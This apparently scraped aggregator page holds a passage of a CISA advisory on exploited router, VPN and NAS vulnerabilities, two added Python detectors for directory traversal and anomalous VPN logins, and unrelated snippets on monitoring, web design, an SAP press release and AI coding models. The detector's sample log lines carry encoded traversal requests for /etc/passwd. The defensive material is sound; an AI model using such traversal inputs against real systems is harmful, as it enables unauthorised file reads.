
Detection Methods 

  • CISA has developed a free detection tool for this vulnerability: cisa.gov/check-cve-2019-19781: Test a host for susceptibility to CVE-2019-19781.
  • Nmap developed a script that can be used with the port scanning engine: CVE-2019-19781 – Citrix ADC Path Traversal #1893.
  • Citrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781: Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781.
  • CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF and signatures at https://github.com/nsacyber/Mitigating-Web-Shells.

Vulnerable Technologies and Versions 

The vulnerability affects the following Citrix product versions on all supported platforms:

  • Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24
  • NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18
  • NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13
  • NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15
  • NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12
  • Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b 

References 

https://support.citrix.com/article/CTX267027

 

Table 6: Information on DrayTek CVE-2020-8515

                                                 DrayTek CVE-2020-8515          CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.

Recommended Mitigations 

  • Users of affected models should upgrade to 1.5.1 firmware or later as soon as possible; the updated firmware addresses this issue.
  • Disable the remote access on your router if you don’t need it.
  • Disable remote access (admin) and SSL VPN. The ACL does not apply to SSL VPN connections (Port 443) so you should also temporarily disable SSL VPN until you have updated the firmware.
  • Always back up your config before doing an upgrade.
  • After upgrading, check that the web interface now shows the new firmware version.
  • Enable syslog logging for monitoring if there are abnormal events. 
Detection Methods 

  • Check that no additional remote access profiles (VPN dial-in, teleworker or LAN to LAN) or admin users (for router admin) have been added.
  • Check if any ACL (Access Control Lists) have been altered.
Vulnerable Technologies and Versions 

  • This vulnerability affects the Vigor3900/2960/300B before firmware version 1.5.1.

References 

https://draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html
https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html

 

Table 7: Information on D-Link CVE-2019-16920

                                                   D-Link CVE-2019-16920          CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a “PingTest” device common gateway interface that could lead to command injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.

Recommended Mitigations 

  • The recommendation is to replace affected devices with ones that are currently supported by the vendor. End-of-life devices should not be used.
Detection Methods 

  • HTTP packet inspection to look for arbitrary input to the “ping_test” command 
Vulnerable Technologies and Versions 

  • DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825

References 

https://www.kb.cert.org/vuls/id/766427
https://fortiguard.com/zeroday/FG-VD-19-117
https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
https://www.seebug.org/vuldb/ssvid-98079

 

Table 8: Information on Fortinet CVE-2018-13382

                                                     Fortinet CVE-2018-13382            CVSS 3.0: 7.5 (High)

Vulnerability Description 

An Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests.

Recommended Mitigations 

  • Upgrade to FortiOS versions 5.4.11, 5.6.9, 6.0.5, 6.2.0 or above and/or upgrade to FortiProxy version 1.2.9 or above or version 2.0.1 or above.
  • SSL VPN users with local authentication can mitigate the impact by enabling Two-Factor Authentication (2FA).
  • Migrate SSL VPN user authentication from local to remote (LDAP or RADIUS).
  • Totally disable the SSL-VPN service (both web-mode and tunnel-mode) by applying the following CLI commands: config vpn ssl settings, unset source-interface, end.
Detection Methods 

  • HTTP packet inspection to look for specially crafted packets containing the magic key for the SSL VPN password modification

Vulnerable Technologies and Versions

This vulnerability affects the following products: 

  • Fortinet FortiOS 6.0.0 to 6.0.4
  • Fortinet FortiOS 5.6.0 to 5.6.8
  • Fortinet FortiOS 5.4.1 to 5.4.10
  • Fortinet FortiProxy 2.0.0
  • Fortinet FortiProxy 1.2.8 and below
  • Fortinet FortiProxy 1.1.6 and below
  • Fortinet FortiProxy 1.0.7 and below

FortiOS products are vulnerable only if the SSL VPN service (web-mode or tunnel-mode) is enabled and users are configured with local authentication.

References 

https://fortiguard.com/psirt/FG-IR-18-389
https://fortiguard.com/advisory/FG-IR-18-389
https://www.fortiguard.com/psirt/FG-IR-20-231

 

Table 9: Information on Mikrotik CVE-2018-14847

                                            Mikrotik CVE-2018-14847            CVSS 3.0: 9.1 (Critical)

Vulnerability Description 

MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.

Recommended Mitigations 

  • Upgrade WinBox and RouterOS and change passwords
  • Firewall the WinBox port from the public interface and from untrusted networks
Detection Methods 

  • Use the export command to see all of your configuration and inspect it for any abnormalities, such as unknown SOCKS proxy settings and scripts.

Vulnerable Technologies and Versions 

This vulnerability affected the following MikroTik products:

  • All bugfix releases from 6.30.1 to 6.40.7
  • All current releases from 6.29 to 6.42
  • All RC releases from 6.29rc1 to 6.43rc3

References

https://blog.mikrotik.com/security/winbox-vulnerability.html

 

Table 10: Information on Netgear CVE-2017-6862

                                             Netgear CVE-2017-6862                  CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

NETGEAR WNR2000v3 devices before 1.1.2.14, WNR2000v4 devices before 1.0.0.66, and WNR2000v5 devices before 1.0.0.42 allow authentication bypass and remote code execution via a buffer overflow that uses a parameter in the administration webapp. The NETGEAR ID is PSV-2016-0261.

Recommended Mitigations 

  • NETGEAR has released firmware updates that fix the unauthenticated remote code execution vulnerability for all affected products. 
Detection Methods 

  • HTTP packet inspection to find any specially crafted packets attempting a buffer overflow through specialized parameters.

Vulnerable Technologies and Versions 

This vulnerability affects the following products:

  • WNR2000v3 before version 1.1.2.14
  • WNR2000v4 before version 1.0.0.66
  • WNR2000v5 before version 1.0.0.42
  • R2000

References 

https://kb.netgear.com/000038542/Security-Advisory-for-Unauthenticated-Remote-Code-Execution-on-Some-Routers-PSV-2016-0261
https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_netgear_wnr2000v5_-_cve-2017-6862.pdf
http://www.securityfocus.com/bid/98740

 

Table 11: Information on Pulse CVE-2019-11510

                                              Pulse CVE-2019-11510                   CVSS 3.0: 10 (Critical)

Vulnerability Description 

In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to exploit an arbitrary file reading vulnerability. 

Recommended Mitigations 

  • Upgrade to the latest Pulse Secure VPN.
  • Stay alert to any scheduled tasks or unknown files/executables.
  • Create detection/protection mechanisms that respond on directory traversal (/../../../) attempts to read local system files.
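The directory traversal detection that this bullet (and the Citrix CVE-2019-19781 traversal in Table 5) calls for is illustrated below with an added example that is not part of the CISA advisory. It normalizes each request path the way a lenient web server would (query string dropped, percent-decoding applied twice to catch double-encoding, backslashes folded to slashes) before counting parent-directory segments, so encoded variants of "/../../../" are not missed; the access-log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache/Nginx combined-style); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2020:10:00:01 +0000] "GET /portal/login HTTP/1.1" 200 1234
203.0.113.7 - - [10/Jan/2020:10:00:02 +0000] "GET /portal/..%2f..%2f..%2fetc/passwd HTTP/1.1" 200 512
203.0.113.9 - - [10/Jan/2020:10:00:03 +0000] "GET /images/%252e%252e/%252e%252e/etc/hosts HTTP/1.1" 404 0
203.0.113.9 - - [10/Jan/2020:10:00:04 +0000] "GET /files/report..old.txt?v=1..2 HTTP/1.1" 200 8000
"""

# Common/combined log format prefix: client, identity, user, timestamp, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)


def normalize_path(target: str) -> str:
    """Return the request path as a lenient server would interpret it:
    query string dropped, percent-decoding applied twice (so %252e%252e
    becomes ..), and backslashes folded to forward slashes."""
    path = target.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    return path.replace("\\", "/")


def traversal_depth(target: str) -> int:
    """Number of parent-directory ('..') path segments after normalization.
    A '..' embedded inside a file name (report..old.txt) does not count."""
    return sum(1 for seg in normalize_path(target).split("/") if seg == "..")


def find_traversal_attempts(log_text: str) -> list:
    """Parse access-log lines and return one finding per request whose
    normalized path climbs the directory tree. A 2xx response is marked
    review_first because it suggests the server actually served the file."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a production pipeline would count these
        depth = traversal_depth(m["target"])
        if depth == 0:
            continue
        status = int(m["status"])
        findings.append({
            "ip": m["ip"],
            "timestamp": m["ts"],
            "raw_target": m["target"],
            "normalized_path": normalize_path(m["target"]),
            "depth": depth,
            "status": status,
            "review_first": 200 <= status < 300,
        })
    return findings


if __name__ == "__main__":
    for finding in find_traversal_attempts(SAMPLE_LOG):
        print(finding)
```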

Detection Methods 

  • CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: cisa.gov/check-your-pulse.
  • Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019-11510.nse #1708.

Vulnerable Technologies and Versions 

This vulnerability affects the following Pulse Connect Secure products:

  • 9.0R1 to 9.0R3.3
  • 8.3R1 to 8.3R7
  • 8.2R1 to 8.2R12

References 

https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/

 

Table 12: Information on Pulse CVE-2021-22893

                                               Pulse CVE-2021-22893              CVSS 3.0: 10 (Critical)

Vulnerability Description 

Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.

Recommended Mitigations

  • Update affected systems to PCS 9.1R11.4.
  • Run the PCS Integrity Assurance utility.
  • Enable Unauthenticated Request logging.
  • Enable remote logging.
  • Pulse Secure has published a Workaround-2104.xml file that contains mitigations to protect against this and other vulnerabilities.
  • Monitor capabilities in open source scanners. 
Detection Methods 

  • Log correlation between the authentication servers responsible for LDAP and RADIUS authentication and the VPN server. Authentication failures in either LDAP or RADIUS logs with the associated VPN logins showing success would be an anomalous event worthy of flagging.
  • The Pulse Security Check Tool.
  • A ‘recovery’ file not present in legitimate versions. https://ive-host/dana-na/auth/recover[.]cgi?token=<varies>.
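The log correlation described in the first detection bullet, as an added example that is not part of the advisory: VPN login successes are matched against the LDAP/RADIUS decisions for the same user within a short window, and a success with only failures (or no decision at all) behind it is flagged. The log formats, field names and result values are this example's assumptions, and the events are constructed samples.

```python
from datetime import datetime, timedelta

# Constructed sample events; the "timestamp source key=value ..." shape and the
# result strings are assumptions of this example, not any vendor's log format.
AUTH_LOG = """\
2021-04-20T09:00:00Z radius user=alice result=Access-Accept
2021-04-20T09:00:05Z ldap user=bob result=bind-failure
2021-04-20T09:01:10Z radius user=carol result=Access-Reject
2021-04-20T08:30:00Z radius user=dave result=Access-Accept
"""
VPN_LOG = """\
2021-04-20T09:00:01Z vpn user=alice src=198.51.100.10 event=login-success
2021-04-20T09:00:06Z vpn user=bob src=198.51.100.11 event=login-success
2021-04-20T09:01:11Z vpn user=carol src=198.51.100.12 event=login-success
2021-04-20T09:05:00Z vpn user=dave src=198.51.100.13 event=login-success
2021-04-20T09:06:00Z vpn user=erin src=198.51.100.14 event=login-failure
"""

# Result strings that count as a positive decision from an authentication server.
AUTH_OK = {"Access-Accept", "bind-success"}
# How far back from a VPN login to look for the backing auth decision.
WINDOW = timedelta(seconds=60)


def parse_events(text: str) -> list:
    """Parse 'timestamp source key=value ...' lines into dicts with a datetime ts."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        ev = {"ts": datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ"), "source": parts[1]}
        for kv in parts[2:]:
            key, _, value = kv.partition("=")
            ev[key] = value
        events.append(ev)
    return events


def correlate_vpn_logins(auth_text: str, vpn_text: str, window=WINDOW) -> list:
    """Return one finding per VPN login-success that no auth server backed.
    reason is 'auth_failed' when the window holds only failures/rejects for
    that user, and 'no_auth_record' when the window holds nothing at all."""
    auth_by_user = {}
    for ev in parse_events(auth_text):
        auth_by_user.setdefault(ev.get("user"), []).append(ev)

    findings = []
    for ev in parse_events(vpn_text):
        if ev.get("event") != "login-success":
            continue
        recent = [a for a in auth_by_user.get(ev.get("user"), [])
                  if ev["ts"] - window <= a["ts"] <= ev["ts"]]
        if any(a.get("result") in AUTH_OK for a in recent):
            continue  # backed by an auth server decision: expected behaviour
        findings.append({
            "user": ev.get("user"),
            "vpn_ts": ev["ts"].isoformat(),
            "src": ev.get("src"),
            "reason": "auth_failed" if recent else "no_auth_record",
            "auth_results": [a.get("result") for a in recent],
        })
    return findings


if __name__ == "__main__":
    for finding in correlate_vpn_logins(AUTH_LOG, VPN_LOG):
        print(finding)
```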

Vulnerable Technologies and Versions 

This vulnerability affects Pulse Connect Secure 9.0R3/9.1R1 and higher.

References 

https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
https://blog.pulsesecure.net/pulse-connect-secure-security-update/
https://kb.cert.org/vuls/id/213092
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/
https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html

 

Table 13: Information on QNAP CVE-2019-7192

                                                  QNAP CVE-2019-7192               CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommends updating Photo Station to the latest versions.

Recommended Mitigations 

Update Photo Station to versions: 

  • QTS 4.4.1 Photo Station 6.0.3 and later
  • QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
  • QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
  • QTS 4.2.6 Photo Station 5.2.11 and later 
Detection Methods 

  • N/A

Vulnerable Technologies and Versions 

This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.

References 

https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html

 

Table 14: Information on QNAP CVE-2019-7193

                                                QNAP CVE-2019-7193                  CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

This improper input validation vulnerability allows remote attackers to inject arbitrary code into the system. To fix the vulnerability, QNAP recommends updating QTS to the latest versions.

Recommended Mitigations 

Update QTS to versions: 

  • QTS 4.4.1 build 20190918 and later
  • QTS 4.3.6 build 20190919 and later
Detection Methods 

  • N/A

Vulnerable Technologies and Versions 

This vulnerability affects QNAP QTS 4.3.6 and 4.4.1 or earlier.

References 

https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html

 

Table 15: Information on QNAP CVE-2019-7194

                                               QNAP CVE-2019-7194             CVSS 3.0: 9.8 (Critical)

Vulnerability Description

This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommends updating Photo Station to the latest versions.

Recommended Mitigations 

Update Photo Station to versions: 

  • QTS 4.4.1 Photo Station 6.0.3 and later
  • QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
  • QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
  • QTS 4.2.6 Photo Station 5.2.11 and later
Detection Methods 

  • N/A

Vulnerable Technologies and Versions 

This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.

References 

https://www.qnap.com/zh-tw/security-advisory/nas-201911-25 
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html

 

Table 16: Information on QNAP CVE-2019-7195

                                             QNAP CVE-2019-7195                   CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommends updating Photo Station to the latest versions.

Recommended Mitigations 

Update Photo Station to versions: 

  • QTS 4.4.1 Photo Station 6.0.3 and later
  • QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
  • QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
  • QTS 4.2.6 Photo Station 5.2.11 and later
Detection Methods 

  • N/A

Vulnerable Technologies and Versions 

This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.

References 

https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html

 

Table 17: Information on Zyxel CVE-2020-29583

                                                Zyxel CVE-2020-29583            CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to log in to the SSH server or web interface with admin privileges.

Recommended Mitigations 

  • Download latest patch (4.60 Patch1 or newer)
Detection Methods 

  • Login attempts to the hardcoded undocumented account, seen in either audit logs or intrusion detection systems

Vulnerable Technologies and Versions 

This vulnerability affects the following technologies and versions:

  • ATP series running firmware ZLD V4.60
  • USG series running firmware ZLD V4.60
  • USG FLEX series running firmware ZLD V4.60
  • VPN series running firmware ZLD V4.60
  • NXC2500 running firmware V6.00 through V6.10
  • NXC5500 running firmware V6.00 through V6.10

References 

http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
https://businessforum.zyxel.com/discussion/5252/zld-v4-60-revoke-and-wk48-firmware-release
https://businessforum.zyxel.com/discussion/5254/whats-new-for-zld4-60-patch-1-available-on-dec-15
https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
https://www.zyxel.com/support/CVE-2020-29583.shtml
https://www.zyxel.com/support/security_advisories.shtml

 

Revisions

  • Initial Version: June 7, 2022

Article source: us-cert.gov

Many software developers can attest that some of the most significant issues in their applications arise from database performance. Though many developers prefer to use a relational database for enterprise applications, typical logging and monitoring solutions provide limited signals to detect database performance issues. Rooting out common bad practices such as chatty interactions between the application code and the database is non-trivial.

As developers, we need to understand how our database is performing from the context of user transactions. Ideally, we would have a common tool that can monitor the performance of both the application and the database concerning user transactions. OpenTelemetry has emerged as a popular tool for application monitoring, but it can also be extended for monitoring databases.

Article source: DZONE

Are you bored with some of your current design projects? This month’s collection of website design trends can help break you out of that rut with some fun and funky alternatives.

And all of these options are anything but boring. From visual display to technique, these trends present a different set of challenges.

Here’s what’s trending in design this month.

1. Layers on Layers

These website designs have so many layers of information that you almost don’t know where to look or where the design elements start and stop.

This can be a complex technique to make work because of the number of elements competing for the same attention in the design.

What you are likely to see with this design trend includes an image or video background with some motion but not anything that truly demands attention. Then add on a few still images in smaller frames throughout the design. Layer on text as well for a three-deep effect.

If you interact with these designs, you’ll find that they are not flat either. They all include animated elements, hover states, and interactions that help direct you through the layers of what can be a somewhat complex design.

Western National Parks Association uses a background image, middle images with animations, and multiple text layers (some on the pictures and some on the background). There’s also scroll animation to help build the design. A lot is going on, but it does not feel too busy.

WIP Architects is another design with layers that interact with each other and include motion. With a lot of scroll animation and layers that go in front of and behind other elements, engagement helps this site work.

The Shipwreck Survey uses the same basic layer outline with a little more overlap between elements and less overall animation. The primary animated effect on the homepage is the scroll bar.

2. Directed Click Actions

This interesting website design trend can be incredibly useful or a wasted element – directed click actions. These are buttons, icons, and animations that tell you to click somewhere in the design to move to the next stage of interaction.

The direct approach ensures that users see and have the best possible chance of doing what the design is intended for. On the other hand, if you need this much instruction, is the design too complicated? Or is there a middle ground where this trend looks great and is usable?

In each of the examples below, these directed click actions are a bit different.

HUG Co has a big circle to click in the bottom third of the screen. It’s almost designed like a bullseye, and you can’t miss it. The thing that is interesting here is that most of the video falls below the scroll. The click action also has two emojis to denote action – a smiling face or pointer when you are ready to click. (The click extends the video to full screen.)

ThinkOvery also uses a similar circular click icon. It also takes you to the next screen in a single movement so that you can continue to explore the design.

Living with OCD has a different approach with scroll and back-to-top icons paired in the bottom right corner. The scroll option includes words to help create direction and instruction. It consists of a small animation and an interactive hover state when you get close to the interactive element. The interesting thing here is that it is not actually a button, and you use a traditional scroll to interact.

3. Word Breaks

If you are a stickler for readability, this design trend might make you cringe.

In each of these designs, words are broken across lines – some with and some without hyphens. For the most part, there’s not much confusion about what the words are, but it does make you pause and think during the page experience.

Why would this be a design trend?

It’s a combination of using large typography, long words, and figuring out a solution to create a common experience between large and small screens. Many of these words would not fit on mobile screens, for example, with the same weight, scale, and impact as the desktop counterparts.

Hence, the word break solution. It creates a consistent user experience across devices.

This technique should be used only if you think your audience is savvy enough to understand what you are trying to communicate with the word break. It can be a tricky proposition!

Plantarium breaks at “plant” with a word that’s made up. But with the imagery and supporting terms, you still know immediately what the design is about.

Michelle Beatty takes a common word and breaks it. Because “photog” and “rapher” are the only letters on the screen, it’s pretty easy to figure out. What’s interesting is that the word break is not on the syllable, but the letters do stack nicely with this break visually.

Wreel Collective breaks a word with a hyphen in giant letters – something we rarely see in website design. Hyphens are not often used in this medium. Because of this, it gets your attention and makes you think about the words and the design.

Conclusion

There are a lot of rule-breaking trends in this month’s collection. They are interesting, fun, and require a certain level of risk to execute.

Could you see yourself (or your clients) opting for a design that features one of these trends? Time will tell if these visual compositions grow in popularity or begin to fade fast.


The post 3 Essential Design Trends, June 2022 first appeared on Webdesigner Depot.

Article source: Webdesignerdepot

Levallois-Perret, June 2, 2021: Responsage, a service specialised in advising and guiding employee caregivers, and Tilia, a start-up dedicated to supporting caregivers and backed by BNP Paribas Personal Finance, announce that SAP, the market leader in enterprise application software, has chosen their solutions to support and relieve its caregiving employees in their daily lives.

Caregiving: a major topic of SAP's intergenerational agreement

It is within the framework of the intergenerational agreement signed at the end of last year that SAP chose to support its employee caregivers with the services of Responsage and Tilia.

“More and more employees have to care for an elderly parent, or for a child or spouse who is ill or living with a disability,” says Sandra Lotode, Director of Social Relations. “It was therefore an obvious choice to offer caregivers, as part of our quality-of-working-life programmes, a solution that relieves them and preserves their work-life balance.”

Responsage-Tilia: the ideal answer to the caregiving challenge

A recognised expert in supporting employee caregivers since 2013, Responsage accompanies employees throughout their caregiving journey: a telephone/video interview to prioritise the issues, a documented written answer within 3 working days, a personalised follow-up calendar for assembling files... The Tilia application provides digital access to the Responsage service. In addition, Tilia handles the set-up and coordination of the various service providers the cared-for person needs.

“The support scheme for employee caregivers is part of the social pillar of CSR,” notes Joël Riou, President and Founder of Responsage. “Backed by expert support, the employee preserves his or her physical and mental health. Moreover, thanks to the anonymised reports provided by Responsage, SAP has an objective view of the issue within the company.”

“Tilia is delighted to support companies that put people at the heart of their ambitions and make caregiving a priority of their workplace well-being strategy,” says Christine Lamidel, Founder and Chief Executive Officer of Tilia. “The Responsage-Tilia scheme simplifies caregivers' daily lives and reassures them about their loved one's well-being. Ultimately this helps maintain their professional engagement, a necessity for breaking the isolation caregivers often face.”

About Responsage

Responsage has supported employee caregivers since 2013. The company has more than 100 clients (Danone, L’Oréal, Pernod-Ricard, Crédit Agricole, France Télévisions, Pôle emploi…) and covers more than 250,000 eligible beneficiaries. Responsage relies on a team of experienced social workers, databases of more than 70,000 contacts and an expert writing-assistance tool. The tools collect data on the employees supported and anonymise it into reports. The company can thus steer its social policies.

The service has now been extended to comprehensive social support. Responsage's shareholders include Bayard Presse, Danone, Babilou and the social-impact investment fund PhiTrust. More information on the Responsage website.

About Tilia

Tilia is a turnkey scheme that supports companies and human resources departments wishing to help employees who are facing the situation of a dependent relative. This support takes the form of a collective approach, comprising cycles of awareness-raising conferences for all stakeholders in the company, and an individual approach dedicated to caregivers. The service offered by Tilia was designed to bring respite to employees who must combine professional activity with a caregiving role, and thus help maintain the balance between the different parts of daily life. Tilia assists with every kind of fragility (illness, disability, old age or the aftermath of a life accident) with a view to making it easier to live well at home, lightening caregivers' daily lives and reassuring them about the well-being of their vulnerable relative.

Tilia is a committed startup (social business) that emerged from a BNP Paribas Group intrapreneurship programme, developed by its Chief Executive Officer and Founder Christine Lamidel following her own family experience, and today accelerated by BNP Paribas Personal Finance. More information on Tilia's website and blog. @TiliaOaidants | LinkedIn

About SAP

SAP's strategy is to help every organisation run as an “intelligent enterprise”. As the market leader in enterprise application software, we help companies of all sizes and in all industries run at their best: 77% of the world's commercial transactions touch an SAP® system. Our machine learning, Internet of Things (IoT) and advanced analytics technologies help our customers turn their businesses into “intelligent enterprises”. SAP gives people and organisations deep insight into their business and fosters collaboration so that they can stay ahead of their competitors. We simplify technology so that companies can use our software the way they want to, without disruption. Our end-to-end suite of applications and services enables private and public customers across 25 industries worldwide to operate profitably, adapt continuously and make a difference. With its global network of customers, partners, employees and thought leaders, SAP helps the world run better and improves people's lives. For more information, visit www.sap.com.

The post “SAP chooses the Responsage-Tilia pairing to support its employee caregivers” appeared first on SAP France News.

Article source: sap.com


Copilot, Codex, and AlphaCode: How Good are Computer Programs that Program Computers Now?

Enabled by the rise of transformers in Natural Language Processing (NLP), we’ve seen a flurry of astounding deep learning models for writing code in recent years. Computer programs that can write computer programs, generally known as the program synthesis problem, have been of research interest since at least the late 1960s (pdf) and early 1970s.

In the 2010s and 2020s, program synthesis research has been re-invigorated by the success of attention-based models in other sequence domains, namely the strategy of pre-training massive attention-based neural models (transformers) with millions or billions of parameters on hundreds of gigabytes of text.

Article source: DZONE